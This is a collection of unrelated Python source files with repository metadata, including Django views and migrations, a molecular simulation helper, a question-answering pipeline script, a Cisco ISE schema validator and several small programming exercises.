df7c68265d10a6433fd2266a5d72fd920abbefbb | 11e8bf1ae982cf4aefcc8f146a7d706e854ea8bb | /royale/urls.py | ca5d0de7fc1b38c336288ea9bf9582a93b0c5b42 | [] | no_license | DK-denno/royalAndRich | d9801a8bb26b915a3c6d0e09e3930f4339ff8c52 | 91e36257ce8ea192ff65c993aab7ea23958dc3c5 | refs/heads/master | 2023-08-26T14:16:13.306965 | 2020-02-20T10:10:42 | 2020-02-20T10:10:42 | 240,218,352 | 0 | 0 | null | 2021-09-22T18:36:12 | 2020-02-13T09:07:42 | CSS | UTF-8 | Python | false | false | 460 | py | from django.urls import path
from django.conf.urls.static import static
from django.conf import settings
from . import views
#Your views go here
urlpatterns=[
path(r'',views.index,name="home"),
path(r'about/',views.about,name='about'),
path(r'classes/<int:code>/',views.classes,name="classes"),
path(r'contact/',views.contact,name="contact"),
]
if settings.DEBUG:
urlpatterns+=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | [
"dennisveer27@gmail.com"
] | dennisveer27@gmail.com |
5dbf192b4ecf8a9c22c3a203e1bcfe82214a1d63 | eacfc0cddb477973a3ca491f35da14b1bda477c3 | /src/wepy_tools/sim_makers/openmm/lennard_jones.py | 4a7c741bdea75a841d2beeb2cc3d469f75dffb90 | [
"MIT"
] | permissive | edeustua/wepy | 933ccb4c15b4a80393700333a04fd01f229e27e3 | f1a2ef5c8cc368d5602c9d683983b3af69a48ce2 | refs/heads/master | 2020-09-29T04:40:55.759360 | 2019-12-06T23:33:11 | 2019-12-06T23:33:11 | 226,952,678 | 0 | 0 | MIT | 2019-12-09T19:40:26 | 2019-12-09T19:40:25 | null | UTF-8 | Python | false | false | 2,492 | py | import numpy as np
from scipy.spatial.distance import euclidean
from wepy.runners.openmm import GET_STATE_KWARG_DEFAULTS
from wepy.resampling.distances.distance import Distance
from wepy.boundary_conditions.receptor import UnbindingBC
from openmmtools.testsystems import LennardJonesPair
from wepy_tools.sim_makers.openmm import OpenMMToolsTestSysSimMaker
## Distance Metric
# we define a simple distance metric for this system, assuming the
# positions are in a 'positions' field
class PairDistance(Distance):
def __init__(self, metric=euclidean):
self.metric = metric
def image(self, state):
return state['positions']
def image_distance(self, image_a, image_b):
dist_a = self.metric(image_a[0], image_a[1])
dist_b = self.metric(image_b[0], image_b[1])
return np.abs(dist_a - dist_b)
# class PairUnbinding(BoundaryCondition):
# pass
class LennardJonesPairOpenMMSimMaker(OpenMMToolsTestSysSimMaker):
TEST_SYS = LennardJonesPair
BCS = OpenMMToolsTestSysSimMaker.BCS + [UnbindingBC]
LIGAND_IDXS = [0]
RECEPTOR_IDXS = [1]
UNBINDING_BC_DEFAULTS = {
'cutoff_distance' : 1.0, # nm
'periodic' : False,
}
DEFAULT_BC_PARAMS = OpenMMToolsTestSysSimMaker.DEFAULT_BC_PARAMS
DEFAULT_BC_PARAMS.update(
{
'UnbindingBC' : UNBINDING_BC_DEFAULTS,
}
)
def make_bc(self, bc_class, bc_params):
if bc_class == UnbindingBC:
bc_params.update(
{
'distance' : self.distance,
'initial_state' : self.init_state,
'topology' : self.json_top(),
'ligand_idxs' : self.LIGAND_IDXS,
'receptor_idxs' : self.RECEPTOR_IDXS,
}
)
bc = bc_class(**bc_params)
return bc
def __init__(self):
# must set this here since we need it to generate the state,
# will get called again in the superclass method
self.getState_kwargs = dict(GET_STATE_KWARG_DEFAULTS)
if self.GET_STATE_KWARGS is not None:
self.getState_kwargs.update(self.GET_STATE_KWARGS)
test_sys = LennardJonesPair()
init_state = self.make_state(test_sys.system, test_sys.positions)
super().__init__(
distance=PairDistance(),
init_state=init_state,
system=test_sys.system,
topology=test_sys.topology,
)
| [
"samuel.lotz@salotz.info"
] | samuel.lotz@salotz.info |
31bb29a5c07f4c3feb4ecfe83bfab2823b6a4cfd | 5785d7ed431b024dd910b642f10a6781df50e4aa | /revise-daily/google/educative/dp/8_count_palindromic_substrings.py | 52508c3007719253316bfe8c5f1b6816f8bdfaa4 | [] | no_license | kashyapa/interview-prep | 45d77324446da34d99bf8efedb3544b367b5523e | 7060c090c40602fb9c4778eace2078e1b51e235b | refs/heads/master | 2023-07-28T13:12:49.515299 | 2021-09-06T14:33:25 | 2021-09-06T14:33:25 | 403,706,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py |
def count_palindromic_substrings(s):
n = len(s)
def is_palindrome(t):
return t == t[::-1]
count = 0
for i in range(n):
for j in range(i+1):
substr = s[j:i+1]
if is_palindrome(substr):
count += 1
return count | [
"schandra2@godaddy.com"
] | schandra2@godaddy.com |
86d5c1b6dd0df2f209c9cc42fc7d9348c3668873 | d4442db5a7ab9db2b04fef640a9864f3fba54758 | /test/python/WMComponent_t/JobAccountant_t/fwjrs/genheritagetest.py | 9a7a0a40d5bd27ceeb6ac7e078d5084b139e9fea | [] | no_license | stuartw/WMCore | fa25ff19ab5058a635d35d3c58a0ac56a3e079a1 | 38c39c43f7237fd316930839674ac9be3c0ee8cc | refs/heads/master | 2021-01-18T07:18:18.324604 | 2012-10-18T22:30:34 | 2012-10-18T22:30:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,004 | py | #!/usr/bin/env python
import random
from WMCore.FwkJobReport import Report
from WMCore.DataStructs.Run import Run
from WMCore.Services.UUID import makeUUID
outputModules = ["outputModule1", "outputModule2", "outputModule3",
"outputModule4", "outputModule5", "outputModule6",
"outputModule7", "outputModule8", "outputModule9",
"outputModule10"]
runInfo = Run(1)
runInfo.lumis.extend([11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24,
25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38,
39, 40])
totalReports = 25
inputFilesPerReport = 50
inputFileCounter = 0
for i in range(totalReports):
loadTestReport = Report.Report("cmsRun1")
loadTestReport.addInputSource("PoolSource")
for j in range(inputFilesPerReport):
inputFile = loadTestReport.addInputFile("PoolSource", lfn = "input%i" % inputFileCounter,
events = 600000, size = 600000)
inputFileCounter += 1
Report.addRunInfoToFile(inputFile, runInfo)
for outputModule in outputModules:
loadTestReport.addOutputModule(outputModule)
datasetInfo = {"applicationName": "cmsRun", "applicationVersion": "CMSSW_3_3_5_patch3",
"primaryDataset": outputModule, "dataTier": "RAW",
"processedDataset": "LoadTest10"}
fileAttrs = {"lfn": makeUUID(), "location": "cmssrm.fnal.gov",
"checksums": {"adler32": "ff810ec3", "cksum": "2212831827"},
"events": random.randrange(500, 5000, 50),
"merged": True,
"size": random.randrange(1000, 2000, 100000000),
"module_label": outputModule, "dataset": datasetInfo}
outputFile = loadTestReport.addOutputFile(outputModule, fileAttrs)
Report.addRunInfoToFile(outputFile, runInfo)
loadTestReport.persist("HeritageTest%02d.pkl" % i)
| [
"metson@4525493e-7705-40b1-a816-d608a930855b"
] | metson@4525493e-7705-40b1-a816-d608a930855b |
4d19b71617a5f44cb851d027f2be980d24ad3002 | f6c7084f91434566a9aa1b821d2739edede036f8 | /CreateVariable/DeclGlobalVariable.py | 7835a187bcd4fd36206b75f1ee423dc44fc31e90 | [] | no_license | GANESH0080/Python-WorkPlace | 87fc3776e693d254661c476bfe977c696d087276 | 43196086bee26cbeae25fb7bbacb8dbbde85d648 | refs/heads/master | 2020-09-20T03:45:13.824696 | 2019-11-27T07:27:17 | 2019-11-27T07:27:17 | 224,369,263 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | i = 50
print(i)
def demofunction():
global i
print(i)
i = "Hi Ganesh Salunkhe"
demofunction()
print(i)
| [
"ganusalunkhe@gmail.com"
] | ganusalunkhe@gmail.com |
420668d0471ddfbafbaf0dad7310591ab306d6a3 | a66b69c3f9da9779ae80f347b61f47e3bc5ba145 | /day1011/listex02.py | b3ea0e6ba188c71120e4efb0096c38079bc66870 | [] | no_license | kyungtae92/python-basic | c841d9c9c6196b01da3de007c1298fe2c4b8f693 | 80a2051e37b6e87c9dbfd332c4b2946089ff0d5c | refs/heads/master | 2020-11-25T08:01:22.156661 | 2019-12-17T08:25:38 | 2019-12-17T08:25:38 | 228,567,120 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | # 리스트 문자열에서 인덱스를 이용한 출력
text = "Will is power"
print(text[0], text[3], text[-1])
flist = ["apple", "banana", "tomato", "peach", "pear"]
print(flist[0], flist[3], flist[-1])
# 리스트 또는 문자열에서 슬라이싱에서 원하는 범위만큼 출력
sqr = [0,1,4,9,16,25,35,49]
print(sqr[3:6])
print(sqr[3:])
# 리스트 두개 합치기
marvel = ['스파이더맨', '토르', '아이언맨']
dc = ['슈퍼맨', '베트맨', '아쿠아맨']
heros = marvel + dc # 문자열 합치기
print(heros)
for name in heros:
print(name)
# 리스트를 연속적인 숫자만큼 추가하기
values = [1,2,3] * 3
print(values) | [
"noreply@github.com"
] | kyungtae92.noreply@github.com |
fda51d083f1d95aaab3c9623e46013c49c73c731 | 464d461e2c90724950cae9db0c4b72b55d82aab8 | /jumia/migrations/0008_healthbeautyscrape_kidsfashionscrape_menfashionscrape_womenfashionscrape.py | 3f2670f6ea77d1bac89cbfeb56a8c383c57531a2 | [
"MIT"
] | permissive | Kolaposki/Discoco | 47a1b4dde54612bf7b2adc372fc3ba8950f233af | 0a4d799c19639681e264e2d39f3a1c134d42d573 | refs/heads/master | 2023-05-24T19:46:08.713235 | 2022-07-25T05:32:20 | 2022-07-25T05:32:20 | 233,392,472 | 4 | 3 | null | 2023-05-22T22:40:50 | 2020-01-12T12:55:40 | JavaScript | UTF-8 | Python | false | false | 2,693 | py | # Generated by Django 3.0.1 on 2020-02-07 17:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jumia', '0007_electronicsscrape_fashionscrape'),
]
operations = [
migrations.CreateModel(
name='HealthBeautyScrape',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('percent', models.IntegerField()),
('product', models.CharField(max_length=200)),
('price', models.CharField(max_length=10)),
('old_price', models.CharField(max_length=10)),
('product_url', models.URLField(max_length=300, unique=True)),
('img_url', models.URLField(max_length=300)),
],
),
migrations.CreateModel(
name='KidsFashionScrape',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('percent', models.IntegerField()),
('product', models.CharField(max_length=200)),
('price', models.CharField(max_length=10)),
('old_price', models.CharField(max_length=10)),
('product_url', models.URLField(max_length=300, unique=True)),
('img_url', models.URLField(max_length=300)),
],
),
migrations.CreateModel(
name='MenFashionScrape',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('percent', models.IntegerField()),
('product', models.CharField(max_length=200)),
('price', models.CharField(max_length=10)),
('old_price', models.CharField(max_length=10)),
('product_url', models.URLField(max_length=300, unique=True)),
('img_url', models.URLField(max_length=300)),
],
),
migrations.CreateModel(
name='WomenFashionScrape',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('percent', models.IntegerField()),
('product', models.CharField(max_length=200)),
('price', models.CharField(max_length=10)),
('old_price', models.CharField(max_length=10)),
('product_url', models.URLField(max_length=300, unique=True)),
('img_url', models.URLField(max_length=300)),
],
),
]
| [
"oshodikolapo@gmail.com"
] | oshodikolapo@gmail.com |
8cf61bd51098673db4e399337ad6541fee589be4 | 3973fa32d968b7ab2d1c8da29bffd2d1544151d3 | /scripts/pipeline/predict.py | 68aca425ac4f576611a9ed3afee48f71468e8091 | [
"BSD-3-Clause"
] | permissive | SBUNetSys/DeQA | 638e2fa21013bda5f254c75eb492418f4764d2c9 | 5baf2e151b8230dde3147d2a1e216a3e434375bb | refs/heads/master | 2020-06-19T21:18:07.047544 | 2019-07-14T19:48:00 | 2019-07-14T19:48:00 | 196,876,581 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,422 | py | #!/usr/bin/env python3
# Copyright 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
"""Run predictions using the full DrQA retriever-reader pipeline."""
import argparse
import json
import logging
import os
import sys
import time
import torch
from drqa import pipeline, retriever, DATA_DIR
logger = logging.getLogger()
logger.setLevel(logging.INFO)
fmt = logging.Formatter('%(asctime)s.%(msecs)03d: [ %(message)s ]', '%m/%d/%Y_%H:%M:%S')
console = logging.StreamHandler()
console.setFormatter(fmt)
logger.addHandler(console)
parser = argparse.ArgumentParser()
parser.add_argument('dataset', type=str)
parser.add_argument('--out-file', type=str, default=None,
help="path to write prediction file")
parser.add_argument('--reader-model', type=str, default=None,
help="Path to trained Document Reader model")
parser.add_argument('--normalize', action='store_true', help="Use normalized answer score")
parser.add_argument('--retriever-model', type=str, default=None,
help="Path to Document Retriever model (tfidf)")
parser.add_argument('--db_path', type=str, default=None,
help='Path to Document DB or index')
parser.add_argument('--n_docs', type=int, default=150,
help="Number of docs to retrieve per query")
parser.add_argument('--top_n', type=int, default=150,
help="Number of predictions to make per query")
parser.add_argument('--tokenizer', type=str, default='corenlp',
help=("String option specifying tokenizer type to use "
"(e.g. 'corenlp')"))
parser.add_argument('--no-cuda', action='store_true', help="Use CPU only")
parser.add_argument('--gpu', type=int, default=0,
help="Specify GPU device id to use")
parser.add_argument('--parallel', action='store_true',
help='Use data parallel (split across gpus)')
parser.add_argument('--num-workers', type=int, default=None,
help='Number of CPU processes (for tokenizing, etc)')
parser.add_argument('--batch-size', type=int, default=128,
help='Document paragraph batching size')
parser.add_argument('--predict-batch-size', type=int, default=1,
help='Question batching size')
parser.add_argument('--ranker', type=str, default='lucene')
parser.add_argument('--et_threshold', type=float, default=None,
help='early stopping threshold')
parser.add_argument('--et_model', type=str, default=None,
help='early stopping model')
parser.add_argument("-v", "--verbose", help="log more debug info", action="store_true")
args = parser.parse_args()
if args.verbose:
logger.setLevel(logging.DEBUG)
t0 = time.time()
# log_filename = ('_'.join(sys.argv) + time.strftime("%Y%m%d-%H%M%S")).replace('/', '_')
# logfile = logging.FileHandler('/tmp/%s.log' % log_filename, 'w')
# logfile.setFormatter(fmt)
# logger.addHandler(logfile)
logger.info('COMMAND: python %s' % ' '.join(sys.argv))
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
torch.cuda.set_device(args.gpu)
logger.info('CUDA enabled (GPU %d)' % args.gpu)
else:
logger.info('Running on CPU only.')
if args.ranker.lower().startswith('s'):
ranker = retriever.get_class('sql')(db_path=args.db_path)
elif args.ranker.lower().startswith('l'):
ranker = retriever.get_class('lucene')(index_path=args.db_path)
else:
ranker = retriever.get_class('tfidf')(tfidf_path=args.retriever_model, db_path=args.db_path)
logger.info('Initializing pipeline...')
DrQA = pipeline.DrQA(
reader_model=args.reader_model,
normalize=args.normalize,
tokenizer=args.tokenizer,
batch_size=args.batch_size,
cuda=args.cuda,
data_parallel=args.parallel,
ranker=ranker,
num_workers=args.num_workers,
et_model=args.et_model,
et_threshold=args.et_threshold
)
# ------------------------------------------------------------------------------
# Read in dataset and make predictions
# ------------------------------------------------------------------------------
logger.info('Loading queries from %s' % args.dataset)
queries = []
for line in open(args.dataset):
data = json.loads(line)
queries.append(data['question'])
model_name = os.path.splitext(os.path.basename(args.reader_model or 'default'))[0]
data_name = os.path.splitext(os.path.basename(args.dataset))[0]
outfile = args.out_file or os.path.join(DATA_DIR, '{}-{}.predictions.txt'.format(data_name, model_name))
out_dir = os.path.dirname(outfile)
os.makedirs(out_dir, exist_ok=True)
logger.info('Writing results to %s' % outfile)
with open(outfile, 'w') as f:
batches = [queries[i: i + args.predict_batch_size]
for i in range(0, len(queries), args.predict_batch_size)]
for i, batch in enumerate(batches):
batch_info = '-' * 5 + ' Batch %d/%d ' % (i + 1, len(batches)) + '-' * 5 + ' '
start_query = queries[i]
logger.info(batch_info + start_query)
predictions = DrQA.process(batch, n_docs=args.n_docs, top_n=args.top_n)
for p in predictions:
p = sorted(p, key=lambda k: k['doc_score'], reverse=True)
f.write(json.dumps(p) + '\n')
logger.info('Total time: %.4f' % (time.time() - t0))
| [
"qqcao.cs@gmail.com"
] | qqcao.cs@gmail.com |
966807e614ac6bbe170a8ae017f3233ee5378d41 | 8130c34d546c323d6d5d2ca6b4a67330af08828f | /.history/menu_app/views_20210104163425.py | 0d705d9f471965254e8ff1766b6e951f8ca7ff08 | [] | no_license | lienusrob/final | ba2dad086fc97b21b537ef12df834dfadd222943 | f2726e31f1d51450e4aed8c74021c33679957b28 | refs/heads/master | 2023-02-15T01:36:54.463034 | 2021-01-07T12:47:05 | 2021-01-07T12:47:05 | 327,279,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,003 | py |
from .models import Cart, CartItem, MenuItem, ItemsCategory, Order, Orders, generate_order_id, Extras
from account_app.models import Profile
from .forms import AddToCartForm
from django.views.generic import ListView
from django.shortcuts import render, get_object_or_404, redirect
from django.urls import reverse
from django.utils import timezone
class MenuListView(ListView):
model = MenuItem
template_name = 'items/menu_list.html'
def menu_list_view(request):
item_list = MenuItem.objects.all()
context = {'item_list': item_list,
'item_categories':reversed(ItemsCategory.objects.all()),
'item_categories_side_nav':reversed(ItemsCategory.objects.all())}
return render(request, 'menu_app/menu_list.html', context)
def home(request):
category_menu = ItemsCategory.objects.all()
context = {'category_menu': category_menu}
return render (request, 'homepage.html', context)
def menu_item_detail(request, **kwargs):
item = MenuItem.objects.filter(id=kwargs.get('pk')).first()
context = {'item':item}
return render(request, 'menu_app/item_details.html', context)
def new_order_info(request):
user_profile = get_object_or_404(Profile, user=request.user)
order, created = Order.objects.get_or_create(customer=user_profile.user, is_ordered=False)
if created:
order.ref_code = generate_order_id()
order.save()
context = {'order':order}
return render(request, 'items/order_info.html', context)
def cart (request):
cart = Cart.objects.get(user = request.user, current = True)
cart_items = CartItem.objects.filter(cart = cart)
context = {'cart_items':cart_items}
return render (request, 'menu_app/cart.html', context )
def menu_details(request, name):
category = ItemsCategory.objects.get(name=name)
menu_details = MenuItem.objects.filter(category=category)
context = {'menu_details':menu_details, 'category':name, 'user':request.user}
if request.method=="POST":
form = AddToCartForm(request.POST or None)
form.cart = Cart.objects.get_or_create(user=request.user, current=True)
form.save()
#messages.success(request, "Item" "added to cart successfully!, please go to cart and check for items.")
return render(request, ('menu_app/menu_list.html'), context)
def cart(request):
cart = Cart.objects.get(user=request.user, current=True)
cart_items = CartItem.objects.filter(cart=cart)
extras = Extras.objects.all()
context = {'cart_items':cart_items, 'extras': extras}
return render(request, 'menu_app/cart.html', context)
def view_cart(request):
"""A View that renders the cart contents page"""
return render(request, "cart.html")
def add_to_cart(request, id):
"""Add a quantity of the specified product to the cart"""
quantity = int(request.POST.get('quantity'))
cart = request.session.get('cart', {})
if id in cart:
cart[id] = int(cart[id]) + quantity
else:
cart[id] = cart.get(id, quantity)
request.session['cart'] = cart
return redirect('homepage')
def adjust_cart(request, id):
quantity = int(request.POST.get('quantity'))
cart = request.session.get('cart', {})
if quantity > 0:
cart[id] = quantity
else:
cart.pop(id)
request.session['cart'] = cart
return redirect('view_cart')
def orders (request):
cart = Cart.objects.get(user=request.user, current = True)
cart_items = CartItem.objects.filter(cart__pk__ = cart.pk)
if request.method == "POST":
for key, value in request.POST.items():
if key == "csrfmiddleweartoken":
continue
cart.current == False
cart.date_ordered= timezone.now()
cart.save()
orders= Orders (cart = cart)
orders.save()
cart = Cart(user=request.user)
cart.save()
context = {'order':orders}
return render (request, 'order_info.html', context)
| [
"lienus.rob@hotmail.de"
] | lienus.rob@hotmail.de |
e0650e53f4315a7ace0c0cd4c087506a4d2f209d | 1ff265ac6bdf43f5a859f357312dd3ff788804a6 | /lab_18_if_challenge.py | f421762b2c086de477f11ec2eed7e78cbab95eec | [] | no_license | sgriffith3/july_pyb | f1f493450ab4933a4443518863f772ad54865c26 | 5e06012ad436071416b95613ed46e972c46b0ff7 | refs/heads/master | 2022-11-19T04:58:41.632000 | 2020-07-17T19:46:44 | 2020-07-17T19:46:44 | 279,335,603 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 663 | py | # Hurricane Rating System
import random
storm = random.randint(1, 200)
print(storm)
# Five 157 or greater
if storm >= 157:
print("Cat 5")
# Four 130 to 156
elif storm >= 130:
print("Cat 4")
# Three 111 to 129
elif storm >= 111:
print("Cat 3")
# Two 96 to 110
elif storm >= 96:
print("Cat 2")
# One 74 to 95
elif storm >= 74:
print("Cat 1")
# Tropical Storm 39 to 73
elif storm >= 39:
print("Tropical Storm")
# Tropical Depression less than or equal to 38
else:
print("Tropical Depression")
if storm <= 157 and storm >= 74:
print("Cat 1, 2, 3, or 4")
elif storm >= 157 or storm <= 74:
print("Its not a Cat 1, 2, 3, or 4")
| [
"sgriffith@alta3.com"
] | sgriffith@alta3.com |
e8e1ffe845d61c38aad005af58ab3b94ba501715 | b227199eda4f1e894199c8a8f5e87c39df83af45 | /examples/tdd/tests/functional/test_users.py | 4160a2ee094794a0b20cd67104ddd644ad404cbb | [] | no_license | gabrielfalcao/tumbler | c8d67a8bfd4555ff0fe04f984017620ee320fe7f | 322976083b2c76286f98dcad445eb22b7665f24f | refs/heads/master | 2021-01-20T05:53:47.780517 | 2015-06-24T19:32:58 | 2015-06-24T19:32:58 | 29,232,813 | 3 | 0 | null | 2019-12-20T17:20:26 | 2015-01-14T07:33:42 | Python | UTF-8 | Python | false | false | 788 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
from sure import scenario
from datetime import datetime
from freezegun import freeze_time
from tumbler.core import Web
from timeless.models import User
def prepare_db(context):
context.web = Web()
context.web.prepare_models()
context.web.db.create_all()
def cleanup_db(context):
context.web.db.drop_all()
@freeze_time("2005-01-01")
@scenario(prepare_db, cleanup_db)
def test_create_user(context):
('Creating a user should work')
result = User.create(
email=u'bar@bar.com',
password='foobar'
)
result.to_dict().should.equal({
'date_added': datetime(2005, 1, 1, 0, 0),
'email': u'bar@bar.com',
'id': 1,
'name': None,
'password': u'foobar'
})
| [
"gabriel@nacaolivre.org"
] | gabriel@nacaolivre.org |
d2b6c214a809b88c7e0670089891752e488a98bf | 4e30d990963870478ed248567e432795f519e1cc | /ciscoisesdk/models/validators/v3_1_1/jsd_d0ee193cc65780af11ed96b1758755.py | b8fdbb93fe7fa8f08ca7035bf6c68d28a611e89f | [
"MIT"
] | permissive | CiscoISE/ciscoisesdk | 84074a57bf1042a735e3fc6eb7876555150d2b51 | f468c54998ec1ad85435ea28988922f0573bfee8 | refs/heads/main | 2023-09-04T23:56:32.232035 | 2023-08-25T17:31:49 | 2023-08-25T17:31:49 | 365,359,531 | 48 | 9 | MIT | 2023-08-25T17:31:51 | 2021-05-07T21:43:52 | Python | UTF-8 | Python | false | false | 3,583 | py | # -*- coding: utf-8 -*-
"""Identity Services Engine registerNode data model.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import json
from builtins import *
import fastjsonschema
from ciscoisesdk.exceptions import MalformedRequest
class JSONSchemaValidatorD0Ee193Cc65780Af11Ed96B1758755(object):
"""registerNode request schema definition."""
def __init__(self):
super(JSONSchemaValidatorD0Ee193Cc65780Af11Ed96B1758755, self).__init__()
self._validator = fastjsonschema.compile(json.loads(
'''{
"$schema": "http://json-schema.org/draft-04/schema#",
"properties": {
"allowCertImport": {
"type": "boolean"
},
"fqdn": {
"type": "string"
},
"password": {
"type": "string"
},
"roles": {
"items": {
"enum": [
"PrimaryAdmin",
"PrimaryDedicatedMonitoring",
"PrimaryMonitoring",
"SecondaryAdmin",
"SecondaryDedicatedMonitoring",
"SecondaryMonitoring",
"Standalone"
],
"type": "string"
},
"type": "array"
},
"services": {
"items": {
"enum": [
"DeviceAdmin",
"PassiveIdentity",
"Profiler",
"SXP",
"Session",
"TC-NAC",
"pxGrid",
"pxGridCloud"
],
"type": "string"
},
"type": "array"
},
"userName": {
"type": "string"
}
},
"required": [
"allowCertImport",
"fqdn",
"password",
"roles",
"services",
"userName"
],
"type": "object"
}'''.replace("\n" + ' ' * 16, '')
))
def validate(self, request):
try:
self._validator(request)
except fastjsonschema.exceptions.JsonSchemaException as e:
raise MalformedRequest(
'{} is invalid. Reason: {}'.format(request, e.message)
)
| [
"wastorga@altus.co.cr"
] | wastorga@altus.co.cr |
5b67a2791270a6af0fcb24d49ab43ac438bc7ae7 | 055f4cc4d565b33d76c1f87c0dfe02f67328a3c9 | /celery_snippet/celery_snippet/celery.py | b9d9290076e141092c5ad792b1ebf785e5120dec | [] | no_license | Sundarmax/python-celery-django | 0eb4ac38df69bcaa9fed4f7c3f28b1904bb21fcc | 3b0c47cee80056dae36d970a3ceb774f279548eb | refs/heads/master | 2023-04-02T14:47:01.628356 | 2021-04-08T10:23:41 | 2021-04-08T10:23:41 | 355,795,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 297 | py | from __future__ import absolute_import, unicode_literals
import os
from celery import Celery
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'celery_snippet.settings')
app = Celery('celery_snippet')
app.config_from_object('django.conf:settings', namespace='CELERY')
app.autodiscover_tasks()
| [
"sundar.info22@gmail.com"
] | sundar.info22@gmail.com |
c9efe071470bec0e0fd25716ccb12f14514f472e | 1825283527f5a479204708feeaf55f4ab6d1290b | /leetcode/python/928/original/928.minimize-malware-spread-ii.0.py | f3b1e244ce25969bd413823d5bb20f56702a671e | [] | no_license | frankieliu/problems | b82c61d3328ffcc1da2cbc95712563355f5d44b5 | 911c6622448a4be041834bcab25051dd0f9209b2 | refs/heads/master | 2023-01-06T14:41:58.044871 | 2019-11-24T03:47:22 | 2019-11-24T03:47:22 | 115,065,956 | 1 | 0 | null | 2023-01-04T07:25:52 | 2017-12-22T02:06:57 | HTML | UTF-8 | Python | false | false | 1,960 | py | #
# @lc app=leetcode id=928 lang=python3
#
# [928] Minimize Malware Spread II
#
# https://leetcode.com/problems/minimize-malware-spread-ii/description/
#
# algorithms
# Hard (38.10%)
# Total Accepted: 3K
# Total Submissions: 7.8K
# Testcase Example: '[[1,1,0],[1,1,0],[0,0,1]]\n[0,1]'
#
# (This problem is the same as Minimize Malware Spread, with the differences
# bolded.)
#
# In a network of nodes, each node i is directly connected to another node j if
# and only if graph[i][j] = 1.
#
# Some nodes initial are initially infected by malware. Whenever two nodes are
# directly connected and at least one of those two nodes is infected by
# malware, both nodes will be infected by malware. This spread of malware will
# continue until no more nodes can be infected in this manner.
#
# Suppose M(initial) is the final number of nodes infected with malware in the
# entire network, after the spread of malware stops.
#
# We will remove one node from the initial list, completely removing it and any
# connections from this node to any other node. Return the node that if
# removed, would minimize M(initial). If multiple nodes could be removed to
# minimize M(initial), return such a node with the smallest index.
#
#
#
#
#
#
#
# Example 1:
#
#
# Input: graph = [[1,1,0],[1,1,0],[0,0,1]], initial = [0,1]
# Output: 0
#
#
#
# Example 2:
#
#
# Input: graph = [[1,1,0],[1,1,1],[0,1,1]], initial = [0,1]
# Output: 1
#
#
#
# Example 3:
#
#
# Input: graph = [[1,1,0,0],[1,1,1,0],[0,1,1,1],[0,0,1,1]], initial = [0,1]
# Output: 1
#
#
#
#
# Note:
#
#
# 1 < graph.length = graph[0].length <= 300
# 0 <= graph[i][j] == graph[j][i] <= 1
# graph[i][i] = 1
# 1 <= initial.length < graph.length
# 0 <= initial[i] < graph.length
#
#
#
#
#
class Solution:
def minMalwareSpread(self, graph, initial):
"""
:type graph: List[List[int]]
:type initial: List[int]
:rtype: int
"""
| [
"frankie.y.liu@gmail.com"
] | frankie.y.liu@gmail.com |
b6a5c2f15626edecf3ea8a6763bb009f676c390c | f63dc9959bbd596c04f70f671f9b0cbc70adb552 | /env/lib/python3.6/locale.py | 85ad85424ce8923f94bdd4a9e48f80c782c8e4d2 | [] | no_license | paulfranco/imd_api | efa4e5d5399fea191f215d2a8d907adfb55ab31a | 1889290b5596fd1a020c336cc7c28d8521785a15 | refs/heads/master | 2020-03-16T06:30:31.077649 | 2018-05-09T02:10:03 | 2018-05-09T02:10:03 | 132,556,482 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 51 | py | /Users/paulfranco/anaconda3/lib/python3.6/locale.py | [
"paulfranco@me.com"
] | paulfranco@me.com |
cf18022549aef20a26f2714caf5b93d8f7efabc5 | af7df9d77a2545b54d8cd03e7f4633dce6125f4a | /ch01/dump_db_file.py | 08c49f7df3fa12cf40a63f58a162267690e31ca1 | [] | no_license | socrates77-sh/PP4E | 71e6522ea2e7cfd0c68c1e06ceb4d0716cc0f0bd | c92e69aea50262bfd63e95467ae4baf7cdc2f22f | refs/heads/master | 2020-05-29T08:46:47.380002 | 2018-11-16T10:38:44 | 2018-11-16T10:38:44 | 69,466,298 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | # -*- coding: utf-8 -*-
from make_db_file import loadDbase
